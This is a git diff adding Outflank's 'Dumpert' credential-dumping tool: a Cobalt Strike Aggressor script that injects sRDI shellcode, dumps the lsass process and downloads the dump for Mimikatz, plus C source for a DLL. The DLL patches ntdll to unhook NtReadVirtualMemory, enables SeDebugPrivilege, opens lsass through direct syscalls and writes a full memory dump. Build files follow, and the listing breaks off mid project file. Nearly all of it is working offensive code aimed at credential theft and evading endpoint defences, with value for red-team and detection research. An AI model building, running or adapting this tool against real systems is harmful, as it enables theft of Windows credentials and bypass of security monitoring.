diff --git a/Dumpert-Aggressor/Outflank-Dumpert.bin b/Dumpert-Aggressor/Outflank-Dumpert.bin
new file mode 100644
index 0000000..6101aa6
Binary files /dev/null and b/Dumpert-Aggressor/Outflank-Dumpert.bin differ
diff --git a/Dumpert-Aggressor/Outflank-Dumpert.cna b/Dumpert-Aggressor/Outflank-Dumpert.cna
new file mode 100644
index 0000000..17c58a0
--- /dev/null
+++ b/Dumpert-Aggressor/Outflank-Dumpert.cna
@@ -0,0 +1,35 @@
+#author Cornelis de Plaa
+#@outflank.nl
+
+#injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process.
+#see https://github.com/monoxgas/sRDI
+
+#register help
+beacon_command_register("dumpert", "Create a minidump of lsass process",
+	"Synopsis: dumpert\n\n" .
+	"Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" .
+	"Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\"");
+
+alias dumpert {
+    $bid = $1;
+    $curr_pid = beacon_info($bid, "pid");
+
+    if (-isadmin $bid) {
+        blog($bid, "Dumpert by Outflank");
+        if (-is64 $bid) {
+            bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin"));
+            blog($bid, "Waiting a few seconds for task to complete...");
+            bpause($bid, 10000);
+            bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp");
+            return;
+        }
+        else{
+            berror($bid, "Dumpert is x64 only.");
+            return;
+        }
+    }
+    else{
+        berror($bid, "You need elevated privileges.");
+        return;
+    }
+}
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL.sln b/Dumpert-DLL/Outflank-Dumpert-DLL.sln
new file mode 100755
index 0000000..ba8d097
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 14 for Windows Desktop
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert-DLL", "Outflank-Dumpert-DLL\Outflank-Dumpert-DLL.vcxproj", "{307088B9-2992-4DE7-A57D-9E657B1CE546}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.ActiveCfg = Debug|x64
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.Build.0 = Debug|x64
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.ActiveCfg = Debug|Win32
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.Build.0 = Debug|Win32
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.ActiveCfg = Release|x64
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.Build.0 = Release|x64
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.ActiveCfg = Release|Win32
+		{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
new file mode 100755
index 0000000..28ee4e6
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
@@ -0,0 +1,321 @@
+#undef  _UNICODE
+#define _UNICODE
+#undef  UNICODE
+#define UNICODE
+
+#include <Windows.h>
+#include <stdio.h>
+#include "Dumpert.h"
+#include <DbgHelp.h>
+
+#pragma comment (lib, "Dbghelp.lib")
+
+
+BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
+	BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};
+
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		AssemblyBytes[4] = pWinVerInfo->SystemCall;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
+	}
+	else {
+		return FALSE;
+	}
+
+	LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
+
+	ULONG OldProtection, NewProtection;
+	SIZE_T uSize = 10;
+	NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+	if (status != STATUS_SUCCESS) {
+		return FALSE;
+	}
+
+	status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
+	if (status != STATUS_SUCCESS) {
+		return FALSE;
+	}
+
+	status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
+	if (status != STATUS_SUCCESS) {
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
+	pWinVerInfo->hTargetPID = NULL;
+
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation10;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory10;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation80;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory80;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		ZwQuerySystemInformation = &ZwQuerySystemInformation81;
+		NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
+		NtFreeVirtualMemory = &NtFreeVirtualMemory81;
+	}
+	else {
+		return FALSE;
+	}
+
+	ULONG uReturnLength = 0;
+	NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
+	if (!status == 0xc0000004) {
+		return FALSE;
+	}
+
+	LPVOID pBuffer = NULL;
+	SIZE_T uSize = uReturnLength;
+	status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
+	if (status != 0) {
+		return FALSE;
+	}
+
+	status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
+	if (status != 0) {
+		return FALSE;
+	}
+
+	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
+	if (RtlEqualUnicodeString == NULL) {
+		return FALSE;
+	}
+
+	PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
+	do {
+		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
+			pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
+			break;
+		}
+		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
+
+	} while (pProcInfo);
+
+	status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
+
+	if (pWinVerInfo->hTargetPID == NULL) {
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+BOOL IsElevated() {
+	BOOL fRet = FALSE;
+	HANDLE hToken = NULL;
+	if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
+		TOKEN_ELEVATION Elevation = { 0 };
+		DWORD cbSize = sizeof(TOKEN_ELEVATION);
+		if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
+			fRet = Elevation.TokenIsElevated;
+		}
+	}
+	if (hToken) {
+		CloseHandle(hToken);
+	}
+	return fRet;
+}
+
+BOOL SetDebugPrivilege() {
+	HANDLE hToken = NULL;
+	TOKEN_PRIVILEGES TokenPrivileges = { 0 };
+
+	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
+		return FALSE;
+	}
+
+	TokenPrivileges.PrivilegeCount = 1;
+	TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
+
+	LPWSTR lpwPriv = L"SeDebugPrivilege";
+	if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
+		CloseHandle(hToken);
+		return FALSE;
+	}
+
+	if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
+		CloseHandle(hToken);
+		return FALSE;
+	}
+
+	CloseHandle(hToken);
+	return TRUE;
+}
+
+__declspec(dllexport) void __cdecl Dump() {
+
+	if (sizeof(LPVOID) != 8) {
+		exit(1);
+	}
+
+	if (!IsElevated()) {
+		exit(1);
+	}
+
+	SetDebugPrivilege();
+
+	PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
+
+	// First set OS Version/Architecture specific values
+	OSVERSIONINFOEXW osInfo;
+	osInfo.dwOSVersionInfoSize = sizeof(osInfo);
+
+	_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
+	if (RtlGetVersion == NULL) {
+		exit(1);
+	}
+
+	RtlGetVersion(&osInfo);
+	swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
+	pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
+
+	// Now create os/build specific syscall function pointers.
+	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
+		ZwOpenProcess = &ZwOpenProcess10;
+		ZwClose = &ZwClose10;
+		NtCreateFile = &NtCreateFile10;
+		pWinVerInfo->SystemCall = 0x3F;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
+		ZwOpenProcess = &ZwOpenProcess7SP1;
+		ZwClose = &ZwClose7SP1;
+		NtCreateFile = &NtCreateFile7SP1;
+		pWinVerInfo->SystemCall = 0x3C;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
+		ZwOpenProcess = &ZwOpenProcess80;
+		ZwClose = &ZwClose80;
+		NtCreateFile = &NtCreateFile80;
+		pWinVerInfo->SystemCall = 0x3D;
+	}
+	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
+		ZwOpenProcess = &ZwOpenProcess81;
+		ZwClose = &ZwClose81;
+		NtCreateFile = &NtCreateFile81;
+		pWinVerInfo->SystemCall = 0x3E;
+	}
+	else {
+		exit(1);
+	}
+
+	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
+		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
+	if (RtlInitUnicodeString == NULL) {
+		exit(1);
+	}
+
+	RtlInitUnicodeString(&pWinVerInfo->ProcName, L"lsass.exe");
+
+	if (!GetPID(pWinVerInfo)) {
+		exit(1);
+	}
+
+	pWinVerInfo->lpApiCall = "NtReadVirtualMemory";
+
+	if (!Unhook_NativeAPI(pWinVerInfo)) {
+		exit(1);
+	}
+
+	HANDLE hProcess = NULL;
+	OBJECT_ATTRIBUTES ObjectAttributes;
+	InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
+	CLIENT_ID uPid = { 0 };
+
+	uPid.UniqueProcess = pWinVerInfo->hTargetPID;
+	uPid.UniqueThread = (HANDLE)0;
+
+	NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
+	if (hProcess == NULL) {
+		exit(1);
+	}
+
+	WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
+	WCHAR chWinPath[MAX_PATH];
+	GetWindowsDirectory(chWinPath, MAX_PATH);
+	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
+	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
+
+	UNICODE_STRING uFileName;
+	RtlInitUnicodeString(&uFileName, chDmpFile);
+
+	HANDLE hDmpFile = NULL;
+	IO_STATUS_BLOCK IoStatusBlock;
+	ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
+	OBJECT_ATTRIBUTES FileObjectAttributes;
+	InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+	//  Open input file for writing, overwrite existing file.
+	status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
+		FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
+
+	if (hDmpFile == INVALID_HANDLE_VALUE) {
+		ZwClose(hProcess);
+		exit(1);
+	}
+
+	DWORD dwTargetPID = GetProcessId(hProcess);
+	BOOL Success = MiniDumpWriteDump(hProcess,
+		dwTargetPID,
+		hDmpFile,
+		MiniDumpWithFullMemory,
+		NULL,
+		NULL,
+		NULL);
+
+	ZwClose(hDmpFile);
+	ZwClose(hProcess);
+
+	return;
+}
+
+BOOL APIENTRY DllMain(
+	HINSTANCE hinstDLL,
+	DWORD fdwReason,
+	LPVOID lpReserved)
+{
+
+	switch (fdwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		Dump();
+		break;
+	case DLL_THREAD_ATTACH:
+		break;
+	case DLL_THREAD_DETACH:
+		break;
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h
new file mode 100755
index 0000000..5034900
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h
@@ -0,0 +1,209 @@
+#pragma once
+
+#include <Windows.h>
+
+#define STATUS_SUCCESS 0
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#define FILE_OVERWRITE_IF 0x00000005
+#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
+typedef LONG KPRIORITY;
+
+#define InitializeObjectAttributes( i, o, a, r, s ) {    \
+      (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
+      (i)->RootDirectory = r;                            \
+      (i)->Attributes = a;                               \
+      (i)->ObjectName = o;                               \
+      (i)->SecurityDescriptor = s;                       \
+      (i)->SecurityQualityOfService = NULL;              \
+   }
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef const UNICODE_STRING* PCUNICODE_STRING;
+
+typedef struct _WIN_VER_INFO {
+	WCHAR chOSMajorMinor[8];
+	DWORD dwBuildNumber;
+	UNICODE_STRING ProcName;
+	HANDLE hTargetPID;
+	LPCSTR lpApiCall;
+	INT SystemCall;
+} WIN_VER_INFO, *PWIN_VER_INFO;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+typedef struct _CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+	SystemBasicInformation,
+	SystemProcessorInformation,
+	SystemPerformanceInformation,
+	SystemTimeOfDayInformation,
+	SystemPathInformation,
+	SystemProcessInformation,
+	SystemCallCountInformation,
+	SystemDeviceInformation,
+	SystemProcessorPerformanceInformation,
+	SystemFlagsInformation,
+	SystemCallTimeInformation,
+	SystemModuleInformation
+} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
+
+typedef struct _SYSTEM_PROCESSES {
+	ULONG NextEntryDelta;
+	ULONG ThreadCount;
+	ULONG Reserved1[6];
+	LARGE_INTEGER CreateTime;
+	LARGE_INTEGER UserTime;
+	LARGE_INTEGER KernelTime;
+	UNICODE_STRING ProcessName;
+	KPRIORITY BasePriority;
+	HANDLE ProcessId;
+	HANDLE InheritedFromProcessId;
+} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
+
+typedef struct _IO_STATUS_BLOCK
+{
+	union
+	{
+		LONG Status;
+		PVOID Pointer;
+	};
+	ULONG Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+// Windows 7 SP1 / Server 2008 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+// Windows 8 / Server 2012 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 8.1 / Server 2012 R2 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+
+// Windows 10 / Server 2016 specific Syscalls
+EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
+EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
+EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
+EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle);
+EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
+EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
+EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
+EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
+
+NTSTATUS(*NtAllocateVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID *BaseAddress,
+	ULONG_PTR ZeroBits,
+	PSIZE_T RegionSize,
+	ULONG AllocationType,
+	ULONG Protect
+	);
+
+NTSTATUS(*NtFreeVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID *BaseAddress,
+	IN OUT PSIZE_T RegionSize,
+	ULONG FreeType
+	);
+
+NTSTATUS(*ZwOpenProcess)(
+	PHANDLE ProcessHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	PCLIENT_ID ClientId
+	);
+
+NTSTATUS(WINAPI *ZwQuerySystemInformation)(
+	SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	PVOID SystemInformation,
+	ULONG SystemInformationLength,
+	PULONG ReturnLength
+	);
+
+NTSTATUS(*ZwWriteVirtualMemory)(
+	HANDLE hProcess,
+	PVOID lpBaseAddress,
+	PVOID lpBuffer,
+	SIZE_T NumberOfBytesToRead,
+	PSIZE_T NumberOfBytesRead
+	);
+
+NTSTATUS(*ZwProtectVirtualMemory)(
+	IN HANDLE ProcessHandle,
+	IN PVOID* BaseAddress,
+	IN SIZE_T* NumberOfBytesToProtect,
+	IN ULONG NewAccessProtection,
+	OUT PULONG OldAccessProtection
+	);
+
+NTSTATUS(*NtCreateFile)(
+	PHANDLE FileHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	PLARGE_INTEGER AllocationSize,
+	ULONG FileAttributes,
+	ULONG ShareAccess,
+	ULONG CreateDisposition,
+	ULONG CreateOptions,
+	PVOID EaBuffer,
+	ULONG EaLength
+	);
+
+NTSTATUS(*ZwClose)(
+	IN HANDLE KeyHandle
+	);
+
+typedef NTSTATUS(NTAPI *_RtlGetVersion)(
+	LPOSVERSIONINFOEXW lpVersionInformation
+	);
+
+typedef void (WINAPI* _RtlInitUnicodeString)(
+	PUNICODE_STRING DestinationString,
+	PCWSTR SourceString
+	);
+
+typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
+	PUNICODE_STRING String1,
+	PCUNICODE_STRING String2,
+	BOOLEAN CaseInSensitive
+	);
diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj
new file mode 100755
index 0000000..7d27878
--- /dev/null
+++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj
@@ -0,0 +1,128 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{307088B9-2992-4DE7-A57D-9E657B1CE546}</ProjectGuid>
+    <RootNamespace>OutflankDumpertDLL</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
